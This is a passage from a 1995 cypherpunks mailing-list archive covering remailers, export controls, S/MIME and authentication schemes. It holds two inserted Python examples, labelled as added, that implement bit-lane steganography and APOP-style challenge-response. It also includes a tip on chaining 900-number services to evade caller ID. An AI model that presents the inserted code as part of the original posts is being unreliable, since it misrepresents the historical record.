extropia remail@extropia.wimsey.com       _ --. -..--  13:25:43  99.20%
hroller  hroller@c2.org                   +*-++#+#*--*  1:13:04  99.05%
syrinx   syrinx@c2.org                    +-------- --  3:28:31  99.01%
penet    anon@anon.penet.fi                --+++------  8:45:41  98.69%
alumni   hal@alumni.caltech.edu           #*#**  *****     4:36  97.24%
rahul    homer@rahul.net                  *##+-##***++    10:07  99.98%
rebma    remailer@rebma.mn.org            +--+-.-+_.-  21:34:08  86.95%
c2       remail@c2.org                    ++-+++-  --   2:41:11  85.54%
mix      mixmaster@remail.obscura.com            ---+   3:12:31  77.55%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Mon, 24 Jul 95 05:48:06 PDT
To: cypherpunks@toad.com
Subject: crypto-stegonography?
Message-ID: <199507241239.HAA16213@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I got to thinking about crypto and stego, and wondered if it wouldn't
conceivably be a useful technique to marry crypto and stego in the following
manner (probably thought of before :-):

1> encrypt a message in the Usual Manner.
2> by prior arrangement with the other party (or parties, more on that in a
moment), select a random character that has a bit position value equal to a
bit in the encrypted message. That is, if the first bit of your encrypted
message was a '0', randomly select a character that had a '0' in a specific
bit position (say, bit 3). repeat for remainder of message.
3> transmit said message, mimicking any one of a number of formats.

I think such a scheme would have a number of benefits, in that it could
_conceivably_ support up to 8 recipients (8 different messages encrypted
independently), though 6 would probably be a practical limit. The message
could easily be formatted to resemble a uuencoded image or almost anything
else (with minimal prior arrangement). It maintains real encryption while
providing a considerable 'distractor' effect on an opponent (ie, the old
magician's trick of "watch this hand while I do the real stuff with the
other one" :-). With the same message sent to multiple recipients, the
_apparent_ harmlessness of the message would seem to increase, as well.

For a single recipient, the bandwidth requirements really suck rocks, but
for multiple recipients, the efficiency goes *way* up.

As observed, this has probably been thought of before, but I'd be interested
in hearing any comments....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
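
The bit-position scheme described in the message above, as an added example that is not part of the original post. It goes slightly beyond the single-recipient case: each of up to six recipients is assigned one bit position ("lane") of a character drawn from the 64-character uuencode range, which is why six rather than eight is the practical limit. The function names and the sample byte strings standing in for ciphertext are assumptions.

```python
"""Added example: one ciphertext bit per carrier character, one lane per recipient."""
import secrets

LANES = 6   # carrier characters are chr(32 + v) with v in 0..63, so 6 usable bits


def _bits(data):
    """Yield the bits of a byte string, most significant bit first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(streams):
    """streams maps lane (0..5) -> already-encrypted bytes; returns carrier text."""
    for lane in streams:
        if not 0 <= lane < LANES:
            raise ValueError("lane must be in 0..5 for a printable carrier")
    lanes = {lane: list(_bits(data)) for lane, data in streams.items()}
    length = max(len(bits) for bits in lanes.values())
    out = []
    for n in range(length):
        value = secrets.randbits(LANES)          # random fill for unused lanes
        for lane, bits in lanes.items():
            if n < len(bits):                    # shorter streams get random padding
                value = (value & ~(1 << lane)) | (bits[n] << lane)
        out.append(chr(32 + value))
    return "".join(out)


def extract(carrier, lane, nbytes):
    """Recover nbytes from the agreed lane; the length is agreed in advance."""
    out = bytearray()
    for start in range(0, nbytes * 8, 8):
        byte = 0
        for ch in carrier[start:start + 8]:
            byte = (byte << 1) | (((ord(ch) - 32) >> lane) & 1)
        out.append(byte)
    return bytes(out)


def expansion(streams):
    """Carrier characters transmitted per payload byte actually carried."""
    return len(embed(streams)) / sum(len(data) for data in streams.values())


if __name__ == "__main__":
    # Constructed stand-ins for six independently encrypted 16-byte messages.
    msgs = {lane: bytes([lane + 1]) * 16 for lane in range(LANES)}
    carrier = embed(msgs)
    print(carrier)
    print(extract(carrier, 3, 16) == msgs[3])
    print(expansion({3: msgs[3]}), expansion(msgs))   # 8.0 versus about 1.33
```

The two printed ratios are the bandwidth point the post makes: eight carrier characters per payload byte for one recipient, about 1.33 when all six lanes are in use. A real uuencoded file starts each line with a length character and decodes to data with recognisable structure, so a carrier like this resembles one only superficially.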






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Mon, 24 Jul 95 07:03:09 PDT
To: cypherpunks@toad.com
Subject: Now You Can Own a 'Munitions Tshirt'
Message-ID: <199507241414.IAA19908@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Government. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cryptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitions 
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to dhenson@itsnet.com with the subject of 
'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 24 Jul 95 05:27:19 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507231958.AA00910@snark.imsi.com>
Message-ID: <199507241221.MAA00651@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

R$ wrote:
> > I have serious concerns about whether the DNS stuff will really scale.
> > It's gonna blow out DNS server memory use, and the bigger packets means
> > a *lot* more TCP (vs UDP) activity.

Perry wrote:
> I'm not that worried. HESIOD has already shown that you can afford to
> store really mongo databases in the DNS, and with caching I suspect
> the TCP activity isn't going to be over very wide distances for the
> most part. 

Perry's right.

With a fairly current BIND (named), MIT stores on the order of 100-200
bytes of data per Athena user for ~25000 users.  MIT's been doing this
for years; for the longest time, they were using ~1 MIPS Vaxstation
II's with ~9MB of memory as DNS servers.  

1024 bit RSA public keys are ~128 bytes, as are digital signatures.
If we allow framing and similar stuff to expand the size of the data
to 150 bytes per key/signature, and if each user had a signed key in
the DNS, this would roughly triple the amount of data in the DNS.

This Is Not A Problem.

I haven't looked at the CPU load needed to compute the signatures, but
that takes place off-line, not on-line.

					- Bill



-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMBOQTbT+rHlVUGpxAQEwrgP9HRftK+uw1zDQuLEy8uCe58QHwVXNXJTy
8fxoK5+k7d56/k55l6yVjTrBUnSCRZibukQLididjnkDr3P7Qv3cdafkkSxxTY/5
PMeDL3lYZ2GhjNBkVvRt554b1iL/Gaq/ckbwTpVvcMeUeN0HqWvYMEXnqTIzye8u
1i9kqo6ENiw=
=fqe9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 24 Jul 95 05:49:17 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507241249.IAA28264@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Monty Harder <monty.harder@famend.com> wrote:
 Andrew Spring <ANDREW.SPRING@PING.BE> wrote:
>AS> >  <process-ID.clock@hostname>password
>AS> >
>AS> >and sends it to the server as "APOP username 58349485whatever89583449".
>
>AS> Of course, this requires the user password to be stored unencrypted on the
>AS> server; which you may not want to do.
>
>  Here's a variation, then: Instead of using process-id.clock to
>generate the random stuff for the challenge, have your own (P)RNG make
>up a bunch of them ahead of time, calculate the hashes, and store the
>challenges and hashes on the server.

Instead of that, send H(pid,clock,hostname,H(password)) to the server, for
some hash function H().  Then the server only needs to keep H(password) 
around, rather than the plain password.  This is similar to current
systems, except the plain password isn't sent across the network.

H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc.  Of course,
I'm sure this is far from being a new idea....

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
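
The two variations in this thread, side by side, as an added example that is not code from either poster: Monty Harder's precomputed batch of challenge/response pairs, and the H(challenge, H(password)) scheme in the message above. APOP itself uses MD5; SHA-256 is swapped in here as H, and the class names, the length-prefixed field encoding and the hostname are assumptions.

```python
"""Added example: what the server has to store under each challenge/response variant."""
import hashlib
import hmac
import secrets


def H(*parts):
    """Hash length-prefixed fields so field boundaries stay unambiguous."""
    h = hashlib.sha256()
    for part in parts:
        h.update(len(part).to_bytes(4, "big"))
        h.update(part)
    return h.digest()


def new_challenge(hostname="pop.example.org"):
    """APOP-style <unique.unique@hostname> banner, drawn from a CSPRNG."""
    return f"<{secrets.token_hex(8)}.{secrets.token_hex(4)}@{hostname}>".encode()


def apop_response(challenge, password):
    """The quoted scheme: verifying this needs the plaintext password."""
    return H(challenge, password)


def make_batch(password, count):
    """Harder's variation, run offline: challenge -> expected response."""
    return {c: apop_response(c, password)
            for c in (new_challenge() for _ in range(count))}


class BatchServer:
    """Holds only precomputed pairs; each challenge is valid once."""

    def __init__(self, batch):
        self._pending = dict(batch)

    def issue(self):
        if not self._pending:
            raise RuntimeError("batch exhausted; a new one must be uploaded")
        return next(iter(self._pending))

    def verify(self, challenge, response):
        expected = self._pending.pop(challenge, None)   # spent on any attempt
        return expected is not None and hmac.compare_digest(expected, response)


def conrad_response(challenge, stored):
    """The scheme in the message above: H(challenge, H(password))."""
    return H(challenge, stored)


class VerifierServer:
    """Holds H(password) and issues fresh single-use challenges."""

    def __init__(self, stored):
        self.stored = stored
        self._issued = set()

    def issue(self):
        challenge = new_challenge()
        self._issued.add(challenge)
        return challenge

    def verify(self, challenge, response):
        if challenge not in self._issued:
            return False
        self._issued.discard(challenge)
        return hmac.compare_digest(conrad_response(challenge, self.stored), response)


if __name__ == "__main__":
    password = b"constructed sample password"
    batch_srv = BatchServer(make_batch(password, 3))
    c = batch_srv.issue()
    print(batch_srv.verify(c, apop_response(c, password)))      # True
    ver_srv = VerifierServer(H(password))
    c = ver_srv.issue()
    print(ver_srv.verify(c, conrad_response(c, H(password))))   # True
    c = ver_srv.issue()
    print(ver_srv.verify(c, conrad_response(c, ver_srv.stored)))  # True, no password used
```

The last call shows the trade-off to weigh when choosing between the two: the stored H(password) is itself sufficient to answer any challenge, so the verifier file needs the same protection as a plaintext password file, whereas a leaked batch exposes only the unused pairs it contains.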




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 24 Jul 95 07:30:45 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <9507241429.AA00433@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
>  Does it have to be the case, then, that we even have separate client
>  and server versions? If a new program is going to be written in
>  Java, can't it have the functionality of both client and server?
>
>  Why not "charge" for the ability to send an anonymous message with
>  the duty to have for a short time (maybe an hour or two) running
>  on your machine a node in a remailer network?

Futplex writes:
>  It would be interesting to see how the market would react to this.
>  There might be quite a bit of reluctance to take on the liability
>  of a remailer operator just to send an anonymous message (maybe
>  that's a good thing ;)

Running a remailer is forbidden by many ISP usage agreements.  Many of the  
potential users of a remailer may not be able to 'pony-up' a few hours of  
remailer operation lest they lose their account.  I thought the idea was to  
get more people using the remailers, not fewer (perhaps just fewer  
abusers)...

Also, users must be aware of a remailer (and have its public key) to use it.   
I suppose you could temporarily add the user to a web page which clients  
checked for a list of current remailers.  However, there are issues of  
reputations of long-running remailers, etc...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 06:37:24 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <Pine.SUN.3.91.950722142036.20705B-100000@crl4.crl.com>
Message-ID: <Pine.SUN.3.91.950724093514.18673A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Jul 1995, Sandy Sandfort wrote:

> Date: Sat, 22 Jul 1995 14:27:50 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: CALLER ID AVOIDANCE
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> While reading the July issue of Soldier of Fortune, I ran across
> an ad for yet another telephone anonymity service.  It reads:
> 
> 			CALL 1-900-CUT TRAX
> 
> 	Secure your most sensitive calls from all forms of
> 	caller I.D. and return-call technologies?
> 
> 	Now make calls from your own telephone safely and
> 	anonymously.  No need to find a public phone to
> 	be discreet.
> 
> 	Trackers never see your number...only ours!  And
> 	their number will not appear on your phone bill.
> 
> 	Call any number in the continental US...
> 
> 	Just $3.95 a minute for safe secure conversations!
> 
> 	Call 1-900-CUT-TRAX (1-900-288-8729)
> 	Beacon Telesystems 914-423-3329
> 
> Not necessarily as secure as they would have you believe, but
> it does demonstrate there is a market for anonymity, I guess.

If one can afford it, I suggest chaining through 
1-900-CUT-TRAX
and
1-900-STO-PPER

There was some talk of one or the other of these services halting access 
to other 1-900 numbers.  Haven't used it recently enough to know if it 
still works.

> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Mon, 24 Jul 95 06:35:04 PDT
To: cypherpunks@toad.com
Subject: Re: NOISE: advice on applications
Message-ID: <9507241334.AA06479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I've just recently set up a PPP account, mainly so I could 
> run Netscape.  I'm thinking of adding PC Eudora for mail.
> Any advice on a good newsreader and any other applications
> it would be handy to have?
> Thanks.
> AR 

     While I have yet to find the Perfect PC Mail Client,
I have to say that I find Pegasus far superior to Eudora. The free
version of Pegasus includes mail filtering capabilities, essential
if you expect to receive mailing lists (such as cypherpunks).



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 24 Jul 95 06:42:16 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <Pine.SUN.3.91.950724093514.18673A-100000@access4.digex.net>
Message-ID: <9507241342.AA06105@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> If one can afford it, I suggest chaining through 
> 1-900-CUT-TRAX
> and
> 1-900-STO-PPER

I doubt you can chain them -- how would they do billing?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 06:58:37 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <9507241342.AA06105@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950724095749.19110A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 24 Jul 1995, Perry E. Metzger wrote:

> Date: Mon, 24 Jul 1995 09:42:01 -0400
> From: Perry E. Metzger <perry@imsi.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: CALLER ID AVOIDANCE 
> 
> 
> Black Unicorn writes:
> > If one can afford it, I suggest chaining through 
> > 1-900-CUT-TRAX
> > and
> > 1-900-STO-PPER
> 
> I doubt you can chain them -- how would they do billing?

You could at one time.  It was great fun.


> 
> .pm
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 07:01:01 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <9507241342.AA06105@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950724095946.19110C-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 24 Jul 1995, Perry E. Metzger wrote:

> Date: Mon, 24 Jul 1995 09:42:01 -0400
> From: Perry E. Metzger <perry@imsi.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: CALLER ID AVOIDANCE 
> 
> 
> Black Unicorn writes:
> > If one can afford it, I suggest chaining through 
> > 1-900-CUT-TRAX
> > and
> > 1-900-STO-PPER
> 
> I doubt you can chain them -- how would they do billing?
> 
> .pm
> 

I just tried both ways, can't anymore.

Pity.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@io.org>
Date: Mon, 24 Jul 95 07:20:40 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <12071.9507111559@exe.dcs.exeter.ac.uk>
Message-ID: <199507241415.KAA26817@wink.io.org>
MIME-Version: 1.0
Content-Type: text


Sorry for taking so long to respond to this.

I have been checking out the Canadian rules for exporting crypto.
Basically (according to "A Guide to Canada's Export Controls",
published by the Department of Foreign Affairs and International
Trade) public domain software can be exported from Canada -- one
might need to file a form with Canadian Customs for each export,
but the export itself is legal. (Public domain is defined as
technology that has been made available without restrictions upon
its further dissemination. Copyright restrictions do not remove
technology from the public domain. So, I'm not quite sure if PGP
falls within that definition.)

However, goods of U.S. origin are export restricted, unless said
goods are further processed outside the U.S. so as to result in a
substantial change in value, so some of the PGP development would
need to be done in Canada.
--
	-marc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Mon, 24 Jul 95 07:59:47 PDT
To: "M. Plumb" <aba@atlas.ex.ac.uk
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507241415.KAA26817@wink.io.org>
Message-ID: <9507241057.ZM10085@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 24, 10:15am, M. Plumb wrote:
> I have been checking out the Canadian rules for exporting crypto.
> Basically (according to "A Guide to Canada's Export Controls",
> published by the Department of Foreign Affairs and International
> Trade) public domain software can be exported from Canada -- one
> might need to file a form with Canadian Customs for each export,
> but the export itself is legal. (Public domain is defined as
> technology that has been made available without restrictions upon
> its further dissemination. Copyright restrictions do not remove
> technology from the public domain. So, I'm not quite sure if PGP
> falls within that definition.)
Synchronicity! [argh] I had been considering making a posting along
the same lines. Note that the form required [EXT 1042(09/93)] has a
$15 processing fee. (Which might be peanuts if we're selling a
frigate, but which is a royal pain for a piece of crypto.)

Page 1, "A guide to Canada's Export Controls", April 1994

General "Software" Note
This list does not embargo "software" which is either:
1.	Generally available to the public by being:
	a.	Sold from stock at retail selling points, without
		restriction, by means of:
		1.	Over-the-counter transactions;
		2.	Mail order transactions; or
		3.	Telephone call transactions; and
	b.	Designed for installation by the user without further
		substantial support by the supplier; or
2.	"In the public domain".



<sigh>

Excerpts relating to Canadian Export controls on cryptography should
be up somewhere off http://www.io.org/~samwise/interesting.html#privacy
towards the end of the week.

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@alias.com/g4frodo@cdf.toronto.edu
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 24 Jul 95 11:23:39 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
Message-ID: <ac39334805021004c0ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 7/23/95, Bob Snyder wrote:
>tcmay@sensemedia.net said:
>> With regard to SSL and Netscape not being open to outside developers,
>> several leading e-mail outfits, including Qualcomm, Netscape,
>> Frontier, etc., are working on an interoperable secure e-mail
>> standard called "Secure/MIME," or "S/MIME."
>
>Do you have sources for this information?  MOSS is out there at least as an
>Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the
>original author of Eudora, is pretty active in the MIME community and I doubt
>he would support a second MIME type to do the same thing...

Some of you have expressed skepticism about the mention of "S/MIME."

The longterm significance of S/MIME is debatable, of course. But here's the
press release I got from Jim Bidzos:



Date: Wed, 19 Jul 95 10:34:04 PDT
From: jim@RSA.COM (Jim Bidzos)
To: tcmay@sensemedia.net
Subject: Integrating RSA into Netscape (Netnews and Mail)


FYI...

     RSA News Release

     For information, contact:

     Patrick Corman or Lisa Croel
     Corman/Croel Marketing & Communications
     (415) 326-9648 or (415) 326-0487
     Corman@cerf.net or Lcroel@mediacity.com


     Major Networking and Messaging Vendors Endorse Open Specification for
     Secure E-Mail

     S/MIME Based on RSA Public-Key Encryption Technology

     Redwood Shores, CA -- July 24, 1995 -- Several major networking and
     messaging vendors, in conjunction with leading cryptography developer
     RSA Data Security today announced their endorsement of a specification
     for interoperable e-mail security, to be known as "S/MIME", short for
     "Secure/Multipurpose Internet Mail Extensions".  Several of the
     vendors announced plans to release S/MIME-compliant products next
     quarter.

     The S/MIME specification is based on the popular Internet MIME
     standard (RFC 1521), which provides a general structure for the
     content type of Internet mail messages and allows extensions for new
     content type applications... like security.  S/MIME will allow vendors
     to independently develop interoperable RSA-based security for their
     e-mail platforms, so that an S/MIME message composed and encrypted on
     one vendor's application can be successfully received and decrypted on
     a different one.

     Major vendors who today announced support for the S/MIME secure
     interoperable e-mail plan include Microsoft, Lotus, Banyan,
     ConnectSoft, QUALCOMM, Frontier Technologies, Network Computing
     Devices, FTP Software, VeriSign, Wollongong, SecureWare and RSA.

     Sophisticated encryption and authentication technology has been viewed
     as the crucial enabling technology for electronic commerce over the
     World Wide Web -- but encryption has been slow to come to e-mail, with
     most packages offering no security whatsoever. "Commercial e-mail
     packages don't offer encryption because, up until now, there have been
     few open security specifications," said Jim Bidzos, RSA President.
     "Internet Privacy-Enhanced Mail (PEM) is excellent for text-based
     messages. MIME represents the next generation, and has been widely
     adopted because of its ability to handle nearly any content type. The
     new S/MIME allows you to secure this rich content."

     Today's flurry of official endorsements from industry bodes well for
     the S/MIME plan.
     "We fully expect S/MIME to be the de facto standard for
     vendor-independent e-mail encryption.  Solid encryption is something
     that our customers have been asking us for, but up until now, we
     didn't have a viable option.  S/MIME gives them everything they want:
     RSA encryption, digital signatures, and the ability to mix different
     vendors' e-mail systems without losing that security," said Bob
     Dickinson, ConnectSoft Vice President and General Manager Consumer
     Online Products & Services Division.

     "Frontier Technologies believes that in the future most companies will
     routinely encrypt electronic mail messages sent over the public
     Internet," said Dr. Prakash Ambegaonkar, Frontier Technologies'
     president.  "This will only happen once there is a well-understood
     standard for secure e-mail that is easy to implement.  Frontier has
     several years experience in developing secure e-mail solutions.  In
     order to speed the adoption of the S/MIME specification, Frontier
     Technologies intends not only to be one of the first vendors to
     support S/MIME in its networking software, but to also make our
     initial implementation of the S/MIME protocol freely available for
     other vendors to use as a reference."

     "The freedom to have a private conversation is fundamental to personal
     communication that is the essence of electronic mail," said John
     Noerenberg, Director of Engineering for QUEST products at QUALCOMM.
     "Wide-spread acceptance of specs like S/MIME make it possible for
     individuals and organizations alike to conduct their business over the
     net secure in the knowledge that their private business is, in fact,
     private."

     "FTP Software is glad to endorse the S/MIME blueprint for secure
     electronic communication," said John O'Hara, director of development
     for FTP Software.  "Whether communicating with customers, business
     partners or remote offices, companies need to ensure that confidential
     information stays confidential.  This was difficult in the past, since
     organizations are connected through diverse messaging systems from
     competing vendors.  S/MIME eliminates those barriers by facilitating
     implementations across multiple vendor products."

     "Network Computing Devices is committed to answering market demand for
     network information access software providing an even higher level of
     protection and interoperability over LANs and across the Internet,"
     said Mike Harrigan, co-founder and vice president of NCD.  "S/MIME
     will further enhance our customers' ability to utilize our  e-mail
     solution, Z-Mail, and Internet navigation software tool, Mariner, in
     such a secure networked environment.  For this reason we fully intend
     to support the specification provided by S/MIME within the next
     quarter."

     "This will be an exciting catalyst for the rapid deployment of secure,
     interoperable e-mail from most of the industry leaders," said Web
     Augustine, VeriSign vice president of marketing & business
     development.  "VeriSign is committed to making our Digital ID services
     available to all companies that implement S/MIME and desire to work
     with a trusted third-party to certify public keys for their
     end-users."

     S/MIME is based on the intervendor PKCS (Public Key Cryptography
     Standards) which were established by a consortium of RSA, Microsoft,
     Lotus, Apple, Novell, Digital, Sun and the Massachusetts Institute of
     Technology in 1991.  PKCS is the most widely implemented suite of
     commercial cryptographic standards in the United States.  The common
     PKCS specifications allow developers to independently develop secure
     applications that will interoperate with other PKCS-secured
     applications.

     Developers interested in S/MIME can get more information at RSA's web
     site, at http://www.rsa.com, in the "What's New" section.

     RSA Data Security is the world's "brand name" for cryptography, with
     over 10 million copies of RSA encryption and authentication
     technologies installed and in use worldwide. RSA technologies are part
     of existing and proposed standards for the Internet and World Wide
     Web, CCITT, ISO, ANSI, IEEE, and business, financial and electronic
     commerce networks around the globe. The Company develops and markets
     platform-independent developer's kits, end-user products, and provides
     comprehensive cryptographic consulting services. Founded in 1982 by
     the inventors of the RSA Public Key Cryptosystem, the company is
     headquartered in Redwood City, California.

     S/MIME Vendor Contacts:

     Connectsoft     Tamese Robinson   206/450-9965
     Frontier        Dennis Freeman    414/241-4555
     FTP Software    Jill Dudka        508/659-6458
     Qualcomm        John Noerenberg   619/597-5103
     Microsoft       Tom Johnston      206/936-3233
     Lotus           Kevin Kosh        617/860-5632
     Wollongong      Bob Brodie        415/962-7203
     Banyan          Jay Seaton        508/898-1000
     NCD             Mike Harrigan     415/694-0663
     SecureWare      David Luther      404/315-6295
